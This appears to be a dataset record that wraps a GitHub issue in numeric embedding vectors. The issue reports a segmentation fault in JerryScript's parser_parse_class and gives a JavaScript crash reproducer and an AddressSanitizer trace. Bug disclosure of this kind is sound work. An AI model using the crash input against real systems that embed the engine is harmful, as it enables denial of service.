0.008971689268946648, -0.012283332645893097, -0.021525684744119644, 0.01615222357213497, -0.00907517783343792, 0.011606674641370773, 0.00521822739392519, -0.03004361502826214, -0.0027364843990653753, -0.012864462099969387, -0.007729822304099798, -0.00154238217510283, 0.03830680251121521, -0.02591998130083084, 0.013174928724765778, 0.003005157457664609, 0.02114357240498066, -0.017004016786813736, 0.016574140638113022, 0.004999308381229639, 0.005138620268553495, 0.01560293696820736, -0.015889521688222885, 0.005536654498428106, 0.0038032159209251404, 0.025760767981410027, -0.011471343226730824, 0.0063048601150512695, 0.01760902814567089, -0.0036917664110660553, 0.011558910831809044, -0.004354493226855993, 0.016685590147972107, 0.02606327272951603, 0.021286863833665848, 0.006428251042962074, 0.02127094194293022, 0.009035374037921429, 0.014138171449303627, 0.01842101849615574, 0.009361762553453445, -0.02463035099208355, -0.0032181057613343, -0.0196628849953413, -0.03961235284805298, -0.019519593566656113, -0.012490310706198215, 0.010770803317427635, 0.023579539731144905, 0.01502180751413107, 0.0012826649472117424, -0.004473903216421604, -0.007920878939330578, 0.01354112010449171, 0.011431539431214333, -0.0012866453034803271, -0.011009623296558857, 0.012705248780548573, -0.009274194948375225, -0.013891390524804592, -0.00013657545787282288, -0.006499897222965956, 0.010372769087553024, -0.008310952223837376, -0.004629136528819799, 0.0179752204567194, -0.00022812330280430615, -0.029884401708841324, 0.012944069691002369, 0.0010528002167120576, -0.018086669966578484, -0.010285201482474804, -0.015117335133254528, 0.00947321206331253, -0.00862937979400158, -0.002412086818367243, 0.0009139858302660286, 0.008868199773132801, 0.014647655189037323, -0.00744323804974556, 0.012060433626174927, -0.006961616687476635, 0.016781117767095566, -0.0041276137344539165, -0.0029892362654209137, -0.011646478436887264, 0.006519798655062914, -0.0002729021362029016, -0.02310189977288246, -0.002724543446674943, -0.012816698290407658, 0.011343971826136112, 0.005771494470536709, 0.020267896354198456, 0.003958449233323336, -0.03190641477704048, -0.003896754002198577, 0.0018060797592625022, -0.0046370974741876125, 0.01233905740082264, 0.0014120260020717978, -0.0021513744723051786, 0.016231831163167953, -0.023038214072585106, -0.017179151996970177, 0.02502838522195816, 0.008263188414275646, -0.010428493842482567, 0.003673854749649763, -0.005859062075614929, -0.006567562930285931, 0.0058710030280053616, 0.01410632859915495, 0.04528035968542099, 0.0069934590719640255, 0.0019095686729997396, 0.00702928239479661, -0.017051780596375465, -0.01018967293202877, -0.0033693588338792324, -0.006551641505211592, -0.004724665079265833, 0.0016498513286933303, -0.0035226019099354744, 0.014790947549045086, -0.013859547674655914, -0.013310261070728302, 0.005795376840978861, -0.005524713546037674, 0.000355991767719388, -0.01899418793618679, 0.002284715883433819, 0.02587221749126911, -0.007379552349448204, -0.00034952370333485305, -0.03766994923353195, 0.0033176143188029528, 0.011694242246448994, 0.01273709163069725, -0.0031822826713323593, -0.014926278963685036, 0.016263673081994057, 0.006237194407731295, 0.022194381803274155, 0.003928596619516611, -0.0032419878989458084, -0.023659147322177887, 0.023563619703054428, 0.012370900250971317, 0.0029772950801998377, -0.006973557639867067, -0.005775474943220615, 0.0016607972793281078, -0.021971482783555984, 0.000946326123084873, -0.014361070469021797, 0.006225253455340862, -0.004768448416143656, 0.008279109373688698, -0.01010210532695055, -0.010149870067834854, 0.02015644684433937, -0.0043982770293951035, 0.0052739521488547325, 0.0037196287885308266, -0.010858370922505856, 0.019408144056797028, 0.031619828194379807, 0.002412086818367243, -0.004338571801781654, -0.010388690046966076, -0.001370232435874641, -0.011558910831809044, 0.007908937521278858, 0.0006572538404725492, -0.016231831163167953, -0.004844075068831444, 0.018022984266281128, 0.004135574214160442, 0.0030967053025960922, -0.01568254455924034, 0.006483975797891617, 0.0034051816910505295, -0.002730513922870159, 0.005568497348576784, -0.016812961548566818, -0.0035544445272535086, 0.019424064084887505, -0.008462205529212952, 0.02297452837228775, 0.015579055063426495, 0.0021294825710356236, -0.022831236943602562, -0.02074553817510605, -0.008908003568649292, 0.006647169589996338, 0.002215059706941247, -0.01323065347969532, 0.002272774698212743, -0.001736423815600574, 0.009218470193445683, 0.018612075597047806, 0.01539595890790224, 0.008494047448039055, 0.027639487758278847, 0.01450436282902956, 0.004103731829673052, 0.0033992112148553133, 0.002428008010610938, 0.011280287057161331, -0.012975911609828472, -0.008004466071724892, 0.006631248164921999, 0.006846186704933643, 0.026700127869844437, -0.0014140161219984293, 0.030107300728559494, 0.001749359886161983, 0.006384467240422964, -0.003180292434990406, -0.015698464587330818, -0.029311232268810272, 0.008414440788328648, 0.0015801953850314021, -0.010858370922505856, -0.009266234003007412, 0.009035374037921429, -0.022417280822992325, -0.0034847885835915804, -0.0015115345595404506, -0.006121764425188303, -0.009616504423320293, 0.0038629211485385895, 0.0018210060661658645, 0.0007214368088170886, -0.0051983254961669445, -0.02539457567036152, 0.03252734616398811, -0.019408144056797028, -0.008326873183250427, 0.006149626802653074, 0.004732625558972359, 0.01760902814567089, 0.005449086893349886, -0.016335319727659225, 0.02485325001180172, 0.018229961395263672, -0.000236208361457102, -0.0066352286376059055, 0.008525890298187733, 0.006038177292793989, -0.0067625995725393295, -0.00480427173897624, 0.0001551089226268232, -0.01815035566687584, 0.0177045576274395, -0.010500139556825161, -0.002921570325270295, 0.0174338947981596, 0.011574831791222095, 0.006097882520407438, 0.005114738363772631, -0.009457290172576904, -0.013055519200861454, -0.005878963973373175, 0.018038906157016754, -0.00285589462146163, 0.00030623748898506165, -0.0005970511701889336, -0.014026721939444542, -0.018516546115279198, 0.0019553424790501595, 0.004022134467959404, -0.00231257826089859, -0.0060501182451844215, -0.009799599647521973, -0.023706911131739616, 0.013206771574914455, -0.016335319727659225, -0.0037554518785327673, -0.027432510629296303, -0.022640179842710495, -0.0015065590851008892, -0.01010210532695055, -0.0009965779026970267, 0.011129033751785755, 0.00902741402387619, 0.00027887264150194824, -0.011407657526433468, 0.010372769087553024, 0.010492179542779922, 0.0038529701996594667, -0.0005632182583212852, 0.010611589066684246, 0.012569917365908623, -0.01600097119808197, 0.0030708331614732742, 0.00707306619733572, -0.011622595600783825, 0.025935903191566467, 0.0035325526259839535, -0.011503186076879501, 0.0073755718767642975, -0.0120445117354393, 0.005449086893349886, 0.005906826350837946, 0.011972866021096706, -0.0032280567102134228, 0.018389176577329636, 0.015308392234146595, -0.0044500213116407394, 0.008183581754565239, -0.03805205971002579, 0.0022648139856755733, -0.004756507463753223, -0.0001580941752763465, 0.0007035252638161182, 0.0032181057613343, -0.015746230259537697, -0.004227122291922569, -0.004378375131636858, -0.0025414477568119764, 0.031317323446273804, -0.006567562930285931, 0.003620120231062174, 0.0037514714058488607, 0.029024647548794746, -0.0031086464878171682, -0.013907311484217644, 0.015308392234146595, 0.006483975797891617, -0.00557645782828331, -0.00358230690471828, 0.012171883136034012, -0.0025613494217395782, -0.0007368606165982783, 0.0009572720155119896, 0.006145646795630455, 0.020936593413352966, 0.011272326111793518, 0.012124119326472282, 0.018484704196453094, 0.010866330936551094, -0.00008066409645834938, 0.003154420293867588, 0.03423093259334564, -0.0027961896266788244, 0.021382391452789307, 0.007598471362143755, -0.016812961548566818, 0.00516250217333436, 0.012402743101119995, 0.03123771771788597, 0.020092761144042015, 0.03782916069030762, 0.011813652701675892, 0.004087810404598713, -0.003860930912196636, 0.02646130695939064, 0.016956252977252007, -0.001073696999810636, 0.009083138778805733, 0.012912226840853691, -0.008876160718500614, -0.005520733073353767, -0.016064656898379326, -0.0004574904451146722, -0.017895612865686417, 0.003377319313585758, 0.0014796918258070946, -0.00933788064867258, -0.005472968798130751, -0.006340683437883854, 0.004680881276726723, -0.017959298565983772, 0.00720839761197567, 0.007092967629432678, -0.0028379831928759813, -0.01061955001205206, 0.010404611937701702, 0.008637339808046818, 0.016367163509130478, 0.011566870845854282, -0.017465736716985703, -0.013214732520282269, 0.021732661873102188, -0.006802402902394533, 0.001465760637074709, 0.005329676903784275, 0.020013155415654182, -0.023038214072585106, -0.0047405860386788845, -0.003472847631201148, -0.0016080577624961734, 0.01345355249941349, -0.023340720683336258, -0.0035763364285230637, 0.0045256479643285275, 0.02284715697169304, 0.0004632121999748051, 0.01612834259867668, -0.011941023170948029, -0.021398313343524933, 0.0008229355444200337, 0.013708294369280338, 0.0049435836263000965, 0.006273017730563879, -0.006189430598169565, -0.007749724201858044, 0.0006701899110339582, -0.011009623296558857, -0.006356604862958193, 0.0003383290022611618, 0.002640956314280629, -0.008478126488626003, -0.00231257826089859, -0.023277034983038902, 0.0013931193388998508, 0.006205351557582617, -0.004708743654191494, -0.0020309691317379475, -0.01676519587635994, 0.002300637075677514, 0.011941023170948029, -0.004497785586863756, 0.011797730810940266, 0.01347743533551693, 0.0045773922465741634, 0.02771909534931183, -0.012076354585587978, -0.007773606106638908, -0.0006975547876209021, -0.002750415587797761, 0.0010458346223458648, 0.005118718836456537, 0.0073755718767642975, -0.02310189977288246, -0.008963728323578835, -0.002093659481033683, 0.027066320180892944, -0.012936108745634556, 0.0068899705074727535, -0.0013582913670688868, -0.0037415206898003817, 0.011901220306754112, -0.009950852952897549, -0.03553648665547371, 0.016478613018989563, -0.0061257448978722095, -0.011869377456605434, 0.015690505504608154, 0.01971064880490303, 0.006547661032527685, -0.012506231665611267, -0.005516752600669861, 0.01034888718277216, 0.021398313343524933, -0.015141217969357967, 0.0029812755528837442, -0.016136303544044495, 0.008040289394557476, 0.010738960467278957, 0.0027922093868255615, 0.0029295310378074646, 0.002593192271888256, 0.016008932143449783, -0.005114738363772631, -0.026843421161174774, -0.0025354772806167603, -0.0326387956738472, 0.0023404406383633614, 0.015157138928771019, 0.0032937321811914444, -0.025092070922255516, -0.01048421859741211, -0.009735913947224617, 0.01733836531639099, -0.014162053354084492, -0.009903088212013245, 0.026923026889562607, -0.008414440788328648, 0.009815521538257599, 0.008271148428320885, 0.005182404071092606, -0.011869377456605434, 0.0011811662698164582, -0.008892081677913666, 0.006587464362382889, 0.02346809022128582, -0.005433165468275547, -0.002334470162168145, 0.01065935380756855, 0.004053977318108082, 0.015499448403716087, -0.004430119413882494, -0.016781117767095566, -0.005863042548298836, -0.017593108117580414, -0.03182680904865265, 0.005154541693627834, 0.008613457903265953, 0.014631734229624271, 0.020172368735074997, 0.009138863533735275, -0.0157780721783638, 0.010627510957419872, -0.009178666397929192, -0.007881075143814087, 0.0035027002450078726, 0.009290115907788277, -0.0008622413733974099, -0.013740137219429016, -0.009226430207490921, -0.013413749635219574, -0.0089876102283597, 0.05693479999899864, -0.01459193043410778, 0.01153502892702818, 0.004712723661214113, 0.0020538559183478355, 0.017720477655529976, -0.013899351470172405, 0.0006084946217015386, 0.00056719861458987, -0.016924411058425903, -0.0057436320930719376, -0.016335319727659225, -0.0001440385967725888, -0.004828153643757105, -0.005986433010548353, 0.00711684999987483, 0.006452132947742939, 0.002230981132015586, -0.008279109373688698, -0.025378655642271042, 0.011670360341668129, 0.01247438881546259, 0.01168628130108118, 0.012729130685329437, 0.003387270262464881, 0.0030151084065437317, -0.01445659901946783, -0.0009771737968549132, 0.005560536403208971, -0.021557526662945747, 0.00381117663346231, -0.002061816630885005, -0.011009623296558857, 0.020076841115951538, 0.00847016554325819, 0.020984359085559845, 0.003275820752605796, 0.02685934118926525, -0.012816698290407658, 0.009138863533735275, 0.006611346732825041, 0.01886681653559208, -0.003986311610788107, -0.011081269942224026, -0.00921050924807787, 0.002105600433424115, -0.009449330158531666, -0.003150440054014325, 0.015770111232995987, -0.009146823547780514, 0.026970790699124336, 0.0047644684091210365, -0.014743183739483356, 0.011948984116315842, 0.010388690046966076, 0.023229271173477173, -0.000979661475867033, -0.005652084480971098, -0.010587707161903381, 0.005751593038439751, 0.009719992987811565, -0.001800109283067286, -0.0018598143942654133, -0.00842240173369646, -0.0315561443567276, 0.01155094988644123, 0.0003156907914672047, 0.007276063319295645, 0.015897482633590698, 0.015427801758050919, -0.01760902814567089, -0.00744323804974556, 0.0018389176111668348, -0.006897930987179279, 0.014767065644264221, -0.020140526816248894, 0.016510454937815666, -0.025553788989782333, -0.017943378537893295, -0.0040002427995204926, -0.015698464587330818, -0.013724216260015965, -0.0034648869186639786, -0.0040519870817661285, 0.014353110454976559, -0.019774334505200386, -0.01282465923577547, 0.0060660396702587605, -0.0013941144570708275, 0.034262776374816895, 0.019057873636484146, 0.01886681653559208, -0.0063804867677390575, 0.006535720080137253, 0.03267063945531845, 0.013039597310125828, -0.009258273057639599, -0.001242861500941217, 0.009847363457083702, 0.007021321915090084, 0.025267206132411957, -0.0050709545612335205, -0.03333933651447296, -0.0012060434091836214, -0.002103610197082162, 0.006555621977895498, -0.004836114589124918, -0.009727953933179379, 0.007737783249467611, 0.011877337470650673, -0.01198082696646452, 0.0005806322442367673, 0.009974734857678413, -0.017545344308018684, 0.007077046670019627, 0.008486087433993816, -0.005047072656452656, -0.002428008010610938, -0.012084315530955791, 0.011136994697153568, -0.027193689718842506, -0.0037236090283840895, 0.029964007437229156, -0.009544857777655125, 0.0041276137344539165, -0.0058351801708340645, -0.011527067981660366, 0.006623287685215473, 0.028005680069327354, 0.011678320355713367, -0.0110653480514884, 0.00707306619733572, 0.013286378234624863, 0.005385401658713818, 0.013365985825657845, 0.017195073887705803, -0.0030628724489361048, 0.018261805176734924, 0.015125296078622341, 0.01649453304708004, -0.001214004005305469, 0.03174719959497452, 0.006834245752543211, -0.0030151084065437317, -0.008669182658195496, 0.019965391606092453, -0.013222693465650082, -0.007065105251967907, 0.0039644199423491955, -0.022337675094604492, 0.024789564311504364, 0.01908971555531025, 0.023277034983038902, 0.013525199145078659, -0.012251489795744419, 0.0028399734292179346, 0.01627163402736187, 0.015348195098340511, 0.03004361502826214, 0.008724907413125038, -0.0008776652393862605, 0.015634780749678612, 0.0063207815401256084, 0.00016045749362092465, 0.01524470653384924, -0.013986918143928051, -0.0032001943327486515, -0.005468988791108131, -0.0018369273748248816, 0.012975911609828472, -0.008398519828915596, -0.01609649881720543, 0.005604320205748081, 0.009528936818242073, 0.0015463625313714147, 0.014376992359757423, 0.012713209725916386, -0.02386612445116043, 0.02198740467429161, -0.020124604925513268, -0.0017662763129919767, 0.007288004737347364, -0.014122250489890575, -0.023531775921583176, 0.009807560592889786, -0.0002304866211488843, -0.02396165393292904, -0.013246575370430946, -0.018803130835294724, 0.007670117076486349, 0.0015334264608100057, 0.010898173786699772, 0.017226915806531906, 0.01582583598792553, -0.0008662217296659946, 0.010022498667240143, -0.014305345714092255, -0.023340720683336258, 0.021828191354870796, 0.018516546115279198, 0.0011174808023497462, -0.015387998893857002, -0.004477883689105511, 0.027050398290157318 ]
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
jerryScript version 3.0.0: commit 05dbbd134c3b9e2482998f267857dd3722001cd7 Build platform: Ubuntu 20.04 Build cmd: ``` python tools/build.py --debug --profile=es.next --lto=off --compile-flag=-D_POSIX_C_SOURCE=200809 --compile-flag=-Wno-strict-prototypes --stack-limit=15 ``` Test case ```js function foo() { class Bar { static { var x = ` for (let i = 0, j = 10; i < j;) { } function baz() { return arguments; } class Proto { } `; eval(x); } } return foo; } new Promise(foo); ``` Error message: SEGV on debug version ``` Segmentation fault (core dumped) ``` Error messages in ASAN version: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==3670588==ERROR: AddressSanitizer: SEGV on unknown address 0x00000008 (pc 0x5671dd80 bp 0xffa2bf18 sp 0xffa2be60 T0) ==3670588==The signal is caused by a READ memory access. ==3670588==Hint: address points to the zero page. #0 0x5671dd7f in parser_parse_class jerry-core/parser/js/js-parser-expr.c:1107 #1 0x567421af in parser_parse_statements jerry-core/parser/js/js-parser-statm.c:2787 #2 0x56662c82 in parser_parse_source jerry-core/parser/js/js-parser.c:2280 #3 0x56668fb5 in parser_parse_script jerry-core/parser/js/js-parser.c:3326 #4 0x56614236 in ecma_op_eval_chars_buffer jerry-core/ecma/operations/ecma-eval.c:86 #5 0x5661415b in ecma_op_eval jerry-core/ecma/operations/ecma-eval.c:56 #6 0x566d8c14 in ecma_builtin_global_object_eval jerry-core/ecma/builtin-objects/ecma-builtin-global.c:109 #7 0x566da71e in ecma_builtin_global_dispatch_routine jerry-core/ecma/builtin-objects/ecma-builtin-global.c:594 #8 0x565f26de in ecma_builtin_dispatch_routine jerry-core/ecma/builtin-objects/ecma-builtins.c:1460 #9 0x565f28fb in ecma_builtin_dispatch_call jerry-core/ecma/builtin-objects/ecma-builtins.c:1489 #10 0x566184a8 in ecma_op_function_call_native_built_in jerry-core/ecma/operations/ecma-function-object.c:1217 #11 0x56618e8c in ecma_op_function_call jerry-core/ecma/operations/ecma-function-object.c:1411 #12 0x56618d91 in ecma_op_function_validated_call jerry-core/ecma/operations/ecma-function-object.c:1371 #13 0x566a03a5 in opfunc_call jerry-core/vm/vm.c:758 #14 0x566c08fe in vm_execute jerry-core/vm/vm.c:5217 #15 0x566c0f17 in vm_run jerry-core/vm/vm.c:5312 #16 0x566182ba in ecma_op_function_call_simple jerry-core/ecma/operations/ecma-function-object.c:1176 #17 0x56618e70 in ecma_op_function_call jerry-core/ecma/operations/ecma-function-object.c:1406 #18 0x566a7707 in vm_loop jerry-core/vm/vm.c:1794 #19 0x566c0899 in vm_execute jerry-core/vm/vm.c:5211 #20 0x566c0f17 in vm_run jerry-core/vm/vm.c:5312 #21 0x566967f4 in opfunc_init_static_class_fields jerry-core/vm/opcodes.c:1081 #22 0x566a9f4a in vm_loop jerry-core/vm/vm.c:2150 #23 0x566c0899 in vm_execute jerry-core/vm/vm.c:5211 #24 0x566c0f17 in vm_run jerry-core/vm/vm.c:5312 #25 0x566182ba in ecma_op_function_call_simple jerry-core/ecma/operations/ecma-function-object.c:1176 #26 0x56618e70 in ecma_op_function_call jerry-core/ecma/operations/ecma-function-object.c:1406 #27 0x5662f276 in ecma_promise_run_executor jerry-core/ecma/operations/ecma-promise-object.c:447 #28 0x5662f4dc in ecma_op_create_promise_object jerry-core/ecma/operations/ecma-promise-object.c:514 #29 0x566ec87f in ecma_builtin_promise_dispatch_construct jerry-core/ecma/builtin-objects/ecma-builtin-promise.c:476 #30 0x565f2ba9 in ecma_builtin_dispatch_construct jerry-core/ecma/builtin-objects/ecma-builtins.c:1518 #31 0x56619172 in ecma_op_function_construct_built_in jerry-core/ecma/operations/ecma-function-object.c:1537 #32 0x566196cf in ecma_op_function_construct jerry-core/ecma/operations/ecma-function-object.c:1717 #33 0x566a08f1 in opfunc_construct jerry-core/vm/vm.c:840 #34 0x566c093c in vm_execute jerry-core/vm/vm.c:5236 #35 0x566c0f17 in vm_run jerry-core/vm/vm.c:5312 #36 0x5669e5a3 in vm_run_global jerry-core/vm/vm.c:286 #37 0x565a2753 in jerry_run jerry-core/api/jerryscript.c:548 #38 0x5674f754 in jerryx_source_exec_script jerry-ext/util/sources.c:68 #39 0x5659d688 in main jerry-main/main-desktop.c:156 #40 0xf7653ed4 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1aed4) ```
Memory corruption in parser_parse_class
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5117/comments
0
2023-12-01T08:32:30
2024-05-28T04:59:15Z
https://github.com/jerryscript-project/jerryscript/issues/5117
2,020,374,504
5,117
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Memory corruption in parser_parse_class Issue date: --- start body --- jerryScript version 3.0.0: commit 05dbbd134c3b9e2482998f267857dd3722001cd7 Build platform: Ubuntu 20.04 Build cmd: ``` python tools/build.py --debug --profile=es.next --lto=off --compile-flag=-D_POSIX_C_SOURCE=200809 --compile-flag=-Wno-strict-prototypes --stack-limit=15 ``` Test case ```js function foo() { class Bar { static { var x = ` for (let i = 0, j = 10; i < j;) { } function baz() { return arguments; } class Proto { } `; eval(x); } } return foo; } new Promise(foo); ``` Error message: SEGV on debug version ``` Segmentation fault (core dumped) ``` Error messages in ASAN version: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==3670588==ERROR: AddressSanitizer: SEGV on unknown address 0x00000008 (pc 0x5671dd80 bp 0xffa2bf18 sp 0xffa2be60 T0) ==3670588==The signal is caused by a READ memory access. ==3670588==Hint: address points to the zero page. #0 0x5671dd7f in parser_parse_class jerry-core/parser/js/js-parser-expr.c:1107 #1 0x567421af in parser_parse_statements jerry-core/parser/js/js-parser-statm.c:2787 #2 0x56662c82 in parser_parse_source jerry-core/parser/js/js-parser.c:2280 #3 0x56668fb5 in parser_parse_script jerry-core/parser/js/js-parser.c:3326 #4 0x56614236 in ecma_op_eval_chars_buffer jerry-core/ecma/operations/ecma-eval.c:86 #5 0x5661415b in ecma_op_eval jerry-core/ecma/operations/ecma-eval.c:56 #6 0x566d8c14 in ecma_builtin_global_object_eval jerry-core/ecma/builtin-objects/ecma-builtin-global.c:109 #7 0x566da71e in ecma_builtin_global_dispatch_routine jerry-core/ecma/builtin-objects/ecma-builtin-global.c:594 #8 0x565f26de in ecma_builtin_dispatch_routine jerry-core/ecma/builtin-objects/ecma-builtins.c:1460 #9 0x565f28fb in ecma_builtin_dispatch_call jerry-core/ecma/builtin-objects/ecma-builtins.c:1489 #10 0x566184a8 in ecma_op_function_call_native_built_in jerry-core/ecma/operations/ecma-function-object.c:1217 #11 0x56618e8c in ecma_op_function_call jerry-core/ecma/operations/ecma-function-object.c:1411 #12 0x56618d91 in ecma_op_function_validated_call jerry-core/ecma/operations/ecma-function-object.c:1371 #13 0x566a03a5 in opfunc_call jerry-core/vm/vm.c:758 #14 0x566c08fe in vm_execute jerry-core/vm/vm.c:5217 #15 0x566c0f17 in vm_run jerry-core/vm/vm.c:5312 #16 0x566182ba in ecma_op_function_call_simple jerry-core/ecma/operations/ecma-function-object.c:1176 #17 0x56618e70 in ecma_op_function_call jerry-core/ecma/operations/ecma-function-object.c:1406 #18 0x566a7707 in vm_loop jerry-core/vm/vm.c:1794 #19 0x566c0899 in vm_execute jerry-core/vm/vm.c:5211 #20 0x566c0f17 in vm_run jerry-core/vm/vm.c:5312 #21 0x566967f4 in opfunc_init_static_class_fields jerry-core/vm/opcodes.c:1081 #22 0x566a9f4a in vm_loop jerry-core/vm/vm.c:2150 #23 0x566c0899 in vm_execute jerry-core/vm/vm.c:5211 #24 0x566c0f17 in vm_run jerry-core/vm/vm.c:5312 #25 0x566182ba in ecma_op_function_call_simple jerry-core/ecma/operations/ecma-function-object.c:1176 #26 0x56618e70 in ecma_op_function_call jerry-core/ecma/operations/ecma-function-object.c:1406 #27 0x5662f276 in ecma_promise_run_executor jerry-core/ecma/operations/ecma-promise-object.c:447 #28 0x5662f4dc in ecma_op_create_promise_object jerry-core/ecma/operations/ecma-promise-object.c:514 #29 0x566ec87f in ecma_builtin_promise_dispatch_construct jerry-core/ecma/builtin-objects/ecma-builtin-promise.c:476 #30 0x565f2ba9 in ecma_builtin_dispatch_construct jerry-core/ecma/builtin-objects/ecma-builtins.c:1518 #31 0x56619172 in ecma_op_function_construct_built_in jerry-core/ecma/operations/ecma-function-object.c:1537 #32 0x566196cf in ecma_op_function_construct jerry-core/ecma/operations/ecma-function-object.c:1717 #33 0x566a08f1 in opfunc_construct jerry-core/vm/vm.c:840 #34 0x566c093c in vm_execute jerry-core/vm/vm.c:5236 #35 0x566c0f17 in vm_run jerry-core/vm/vm.c:5312 #36 0x5669e5a3 in vm_run_global jerry-core/vm/vm.c:286 #37 0x565a2753 in jerry_run jerry-core/api/jerryscript.c:548 #38 0x5674f754 in jerryx_source_exec_script jerry-ext/util/sources.c:68 #39 0x5659d688 in main jerry-main/main-desktop.c:156 #40 0xf7653ed4 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1aed4) ``` --- end body ---
4,760
[ -0.006350967567414045, -0.00275737838819623, -0.006961366161704063, 0.010429699905216694, 0.01953275315463543, 0.022694123908877373, -0.027323273941874504, 0.028170069679617882, -0.01662542298436165, 0.05018675699830055, -0.015002396889030933, 0.006605006288737059, 0.015199982561171055, 0.0020481871906667948, 0.03686383739113808, 0.033194392919540405, -0.03782353922724724, 0.004999622702598572, -0.02725270763039589, -0.008439730852842331, 0.00756470812484622, -0.019518639892339706, -0.005976966116577387, 0.043864015489816666, -0.007289499510079622, 0.012539632618427277, 0.014423753134906292, 0.007592934649437666, 0.001885884557850659, 0.0055606248788535595, -0.006432118825614452, 0.024218356236815453, -0.015736287459731102, 0.008517353795468807, 0.044287413358688354, 0.017175840213894844, 0.018558938056230545, 0.03525492921471596, -0.012525519356131554, 0.005691172555088997, 0.029891887679696083, -0.03474685177206993, -0.009300638921558857, 0.017274633049964905, 0.023569146171212196, 0.05560624971985817, 0.04126717522740364, 0.01078958809375763, -0.05586028844118118, 0.015284662134945393, 0.009978075511753559, 0.019405733793973923, 0.015327001921832561, -0.0602353997528553, 0.02877693995833397, -0.03373069688677788, 0.027577312663197517, -0.0001894264278234914, 0.0060087209567427635, 0.027436180040240288, 0.042424462735652924, 0.0020234889816492796, -0.029948340728878975, -0.0009279469377361238, 0.011608157306909561, 0.0762116089463234, -0.016554856672883034, 0.006146325264126062, -0.020845286548137665, 0.0046503194607794285, 0.017698030918836594, -0.039375998079776764, 0.02586960792541504, 0.031387895345687866, 0.03401296213269234, -0.007508255075663328, -0.016695989295840263, 0.03903727978467941, -0.03294035419821739, -0.0053030578419566154, -0.013548730872571468, 0.019927924498915672, 0.013202955946326256, 0.013859222643077374, 0.011064796708524227, 0.005391265731304884, -0.028198296204209328, -0.06288869678974152, -0.0019282243447378278, -0.012899520806968212, -0.032093558460474014, 0.03418232128024101, 0.003644749755039811, 0.017274633049964905, -0.009378261864185333, 0.004466847516596317, -0.04665844142436981, -0.0012851888313889503, -0.03960181027650833, 0.008602033369243145, -0.0003373951476532966, 0.0335613377392292, -0.0018329598242416978, 0.004710300825536251, 0.010683738626539707, 0.04025102034211159, -0.017189953476190567, -0.04279140755534172, 0.047392331063747406, 0.11093023419380188, 0.003000832162797451, 0.011255325749516487, -0.03268631547689438, -0.024839339777827263, 0.005415963940322399, 0.0061992499977350235, -0.007938710041344166, -0.037851765751838684, -0.05151340365409851, 0.02349857985973358, -0.03435168042778969, -0.002605660818517208, -0.021565062925219536, -0.030512871220707893, -0.03102094866335392, 0.030033020302653313, 0.02229895256459713, 0.0020428947173058987, -0.00800927635282278, 0.004237507004290819, -0.03421054780483246, -0.04425918683409691, 0.005902871489524841, -0.02334333397448063, 0.022369518876075745, 0.0069331396371126175, -0.03627108037471771, 0.03872678801417351, 0.014578999020159245, -0.053969111293554306, -0.01663953624665737, -0.033674243837594986, 0.04115426912903786, -0.006096928846091032, 0.003563598496839404, -0.004516243934631348, -0.0015983268385753036, 0.050158530473709106, -0.026081306859850883, -0.01036619022488594, 0.007353009190410376, 0.016413724049925804, 0.04208574444055557, 0.02548854984343052, 0.020266642794013023, -0.003648278070613742, -0.011135363020002842, 0.05137227103114128, 0.0008154818788170815, 0.024317149072885513, -0.017147613689303398, -0.049622226506471634, -0.018191993236541748, -0.01686534844338894, -0.044005148112773895, 0.02687164954841137, 0.004960811231285334, 0.03231937065720558, -0.00708838552236557, 0.00926535576581955, -0.011876309290528297, -0.0051795667968690395, 0.024331262335181236, 0.05509817227721214, -0.0838327705860138, -0.008333881385624409, 0.022284839302301407, 0.007091913837939501, -0.019942037761211395, -0.02330099418759346, 0.039234865456819534, 0.022411858662962914, -0.02392197772860527, 0.002438065828755498, -0.0019987907726317644, -0.024811113253235817, 0.015312888659536839, -0.035763006657361984, -0.010147434659302235, -0.043864015489816666, 0.0032090027816593647, 0.012003328651189804, 0.002235187916085124, -0.018756523728370667, 0.014818924479186535, 0.028988638892769814, -0.01748633198440075, -0.048097994178533554, -0.014303790405392647, 0.00907482672482729, 0.04459790512919426, -0.020097283646464348, -0.0004577989166136831, -0.005338340997695923, -0.02191789448261261, -0.027520859614014626, -0.018079089000821114, 0.023230427876114845, 0.015524587593972683, -0.002619774080812931, -0.025714362040162086, -0.008517353795468807, 0.02339978702366352, -0.027323273941874504, -0.008714939467608929, -0.0017332849092781544, 0.007282442878931761, 0.015933873131871223, -0.01786739006638527, -0.03692029044032097, 0.021071098744869232, -0.0297789815813303, -0.012299707159399986, 0.0013045945670455694, -0.05326344817876816, -0.010817814618349075, -0.029242677614092827, -0.0070954421535134315, -0.02969430200755596, 0.01944807358086109, 0.02087351307272911, -0.014134431257843971, -0.02654704451560974, 0.0053842091001570225, 0.009350035339593887, 0.01031679380685091, 0.005525341723114252, -0.00780463358387351, 0.004547998309135437, 0.020944079384207726, -0.01241261325776577, -0.012299707159399986, -0.04569873958826065, -0.03807757794857025, 0.015312888659536839, 0.035057343542575836, -0.008976034820079803, -0.024712320417165756, 0.0008886944269761443, 0.022214272990822792, -0.009286525659263134, -0.03920663893222809, -0.0027168027590960264, -0.03858565539121628, 0.01824844628572464, -0.0006328915478661656, 0.032714542001485825, 0.020802946761250496, -0.03463394567370415, 0.005909928120672703, 0.014974170364439487, -0.014381413348019123, -0.043186578899621964, 0.017528671771287918, 0.019321054220199585, 0.005271303001791239, -0.04265027493238449, -0.0007546184351667762, 0.0020376022439450026, -0.016089119017124176, 0.021311024203896523, -0.06734848767518997, -0.028508787974715233, -0.007945766672492027, -0.007931653410196304, 0.011001287028193474, 0.011594044044613838, 0.013407598249614239, 0.010951890610158443, -0.002672698814421892, 0.0011414099717512727, 0.00905365776270628, 0.003186068730428815, 0.024669980630278587, 0.032855674624443054, 0.002505103824660182, 0.037851765751838684, -0.030908042564988136, 0.0016971196746453643, -0.027295047417283058, -0.02839588187634945, -0.02272235043346882, -0.010203887708485126, 0.002342801308259368, 0.037146102637052536, 0.00461150798946619, 0.016089119017124176, -0.011714006774127483, 0.01365458033978939, 0.007169536780565977, 0.012906577438116074, -0.0449930764734745, -0.00580055033788085, 0.00561002129688859, -0.0370614230632782, 0.019306940957903862, 